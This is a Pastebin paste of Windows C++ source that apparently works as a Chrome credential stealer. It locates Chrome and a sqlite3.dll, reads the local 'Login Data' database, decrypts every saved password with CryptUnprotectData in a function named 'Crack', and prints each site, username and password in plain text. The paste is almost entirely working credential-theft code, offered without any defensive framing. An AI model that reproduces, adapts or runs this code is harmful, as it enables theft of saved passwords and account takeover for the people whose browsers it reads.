Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <windows.h>
- #include <iostream>
- #include <ShlObj.h>
- #include <io.h>
- using namespace std;
- #pragma comment(lib,"crypt32")
- //Lets see where Google Chrome application is installed
- char * readRegistryValue(){
- LPCSTR value = "Path";
- HKEY hkey = NULL;
- char * sk = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\chrome.exe";
- if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,sk,0,KEY_READ,&hkey) != ERROR_SUCCESS)
- {
- return NULL;
- }
- char path[MAX_PATH] = {0};
- DWORD dw = 260;
- RegQueryValueEx(hkey,value,0,0,(BYTE *)path,&dw);
- RegCloseKey(hkey);
- char *ret = new char[strlen(path)+1];
- strcpy(ret,path);
- return ret;
- //delete[]ret;
- }
- char *Crack(BYTE *pass){
- DATA_BLOB in;
- DATA_BLOB out;
- BYTE trick[1024];
- memcpy(trick,pass,1024);
- int size = sizeof(trick) / sizeof(trick[0]);
- in.pbData = pass;
- in.cbData = size+1;//we can't use strlen on a byte pointer,becouse of the NBs,so we have to be tricky dicky:)
- char *str = new char[1024];
- if (CryptUnprotectData(&in,NULL,NULL,NULL,NULL,0,&out)){
- for(int i = 0; i<out.cbData; i++)
- str[i] = out.pbData[i];
- str[out.cbData]='\0';
- return str;
- }
- else
- return NULL; //Error on decryption
- }
- //To get to Appdata\local
- bool getPath(char *ret,int id){
- memset(ret,0,sizeof(ret));
- if(SUCCEEDED(SHGetFolderPath(NULL,id | CSIDL_FLAG_CREATE,NULL,SHGFP_TYPE_CURRENT,ret)))
- return true;
- return false;
- }
- void find_file(char *dir, char *sqldll)
- {
- char szDir[MAX_PATH]={0};
- sprintf(szDir,"%s\\*.*",dir);
- _finddata_t file;
- long re = _findfirst(szDir,&file);
- if( -1l == re )
- return;
- while( _findnext( re,&file ) == 0)
- {
- if(strcmp(file.name,".") == 0 || strcmp(file.name,"..") == 0)
- continue;
- if( file.attrib != _A_SUBDIR && !strcmp(file.name, "sqlite3.dll"))
- {
- sprintf(sqldll,"%s\\%s",dir,file.name);
- // at this time call will be stop
- break;
- }
- else
- {
- char szSubDir[MAX_PATH]={0};
- sprintf(szSubDir,"%s\\%s",dir,file.name);
- find_file(szSubDir,sqldll);
- /*
- * Speed up the return, not need to loop for find next file after get sqlite3.dll!!!
- * means find first meet the requirements sqlite3.dll, we should be stop completely:)
- */
- if (strstr(sqldll, "sqlite"))
- break;
- }
- }
- }
- //SQLITE definitions
- #define SQLITE_OK 0
- #define SQLITE_ROW 100
- #define SQLITE_API
- typedef struct sqlite3 sqlite3;
- typedef struct sqlite3_stmt sqlite3_stmt;
- //SQLITE function pointers
- typedef int(SQLITE_API *fpSqliteOpen)(const char *, sqlite3 **);
- typedef int(SQLITE_API *fpSqlitePrepare_v2)(sqlite3 *, const char *, int, sqlite3_stmt **, const char **);
- typedef int(SQLITE_API *fpSqliteStep)(sqlite3_stmt *);
- typedef const unsigned char *(SQLITE_API *fpSqliteColumnText)(sqlite3_stmt*, int);
- typedef int(SQLITE_API *fpSqliteFinalize)(sqlite3_stmt *);
- typedef int(SQLITE_API *fpSqliteClose)(sqlite3 *);
- typedef char *(SQLITE_API *fpsqlite3_errmsg)(sqlite3 *);
- fpSqliteOpen sqlite3_open;
- fpSqlitePrepare_v2 sqlite3_prepare_v2;
- fpSqliteStep sqlite3_step;
- fpSqliteColumnText sqlite3_column_text;
- fpSqliteFinalize sqlite3_finalize;
- fpSqliteClose sqlite3_close;
- fpsqlite3_errmsg sqlite3_errmsg;
- void main(){
- //Load sqlite.dll
- // searching have been installed sqlite3.dll with other software that depend on sqlite.
- char szCurrentPath[MAX_PATH] = {0};
- char szProgrameFiles[MAX_PATH] = {0};
- GetEnvironmentVariable("ProgramFiles", szProgrameFiles, MAX_PATH);
- find_file(getenv("ProgramFiles"), szCurrentPath);
- HMODULE sqliteLib = NULL;
- if ( szCurrentPath ) {
- printf("[+] use %s to import need functions\n", szCurrentPath);
- sqliteLib = LoadLibrary(szCurrentPath);
- }
- else
- sqliteLib = LoadLibrary("sqlite3.dll");
- if (sqliteLib){
- //Lets find the functions in the dll
- sqlite3_open = (fpSqliteOpen)GetProcAddress(sqliteLib,"sqlite3_open");
- sqlite3_prepare_v2 = (fpSqlitePrepare_v2)GetProcAddress(sqliteLib,"sqlite3_prepare_v2");
- sqlite3_step = (fpSqliteStep)GetProcAddress(sqliteLib,"sqlite3_step");
- sqlite3_column_text = (fpSqliteColumnText)GetProcAddress(sqliteLib,"sqlite3_column_text");
- sqlite3_finalize = (fpSqliteFinalize)GetProcAddress(sqliteLib,"sqlite3_finalize");
- sqlite3_close = (fpSqliteClose)GetProcAddress(sqliteLib,"sqlite3_close");
- sqlite3_errmsg = (fpsqlite3_errmsg)GetProcAddress(sqliteLib, "sqlite3_errmsg");
- char *installPath = readRegistryValue();
- if (installPath != NULL){
- printf("[+] Installed in: %s\n",installPath);
- //Now we have to call same sqlite functions to start decrypting this shit:)
- sqlite3_stmt *stmt;
- sqlite3 *db;
- char databasePath[260];
- getPath(databasePath,0x1C);
- strcat(databasePath,"\\Google\\Chrome\\User Data\\Default\\Login Data");
- char *query = "SELECT origin_url, username_value, password_value FROM logins";
- //Open the database
- if ( sqlite3_open(databasePath, &db) == SQLITE_OK) {
- if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) {
- //Lets begin reading data
- while (sqlite3_step(stmt) == SQLITE_ROW) {
- //While we still have data in database
- char *url = (char *)sqlite3_column_text(stmt,0);
- char *username = (char *)sqlite3_column_text(stmt,1);
- BYTE *password = (BYTE *)sqlite3_column_text(stmt,2); //This is the only encrypted field
- printf("Url: %s\n",url);
- printf("Username: %s\n",username);
- char *decrypted = Crack(password);
- printf("Password: %s\n",decrypted);
- delete[] decrypted;
- }
- }
- else {
- printf("Error preparing database: %s\n", sqlite3_errmsg(db));
- }
- sqlite3_finalize(stmt);
- sqlite3_close(db);
- }
- else
- printf("Error opening database: %s\n", sqlite3_errmsg(db));
- }
- else
- printf("Google Chrome is not installed!\n");
- delete[]installPath;
- FreeLibrary(sqliteLib);
- }
- else
- printf("Necessary sqlite dll not found!\n");
- cin.get();
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement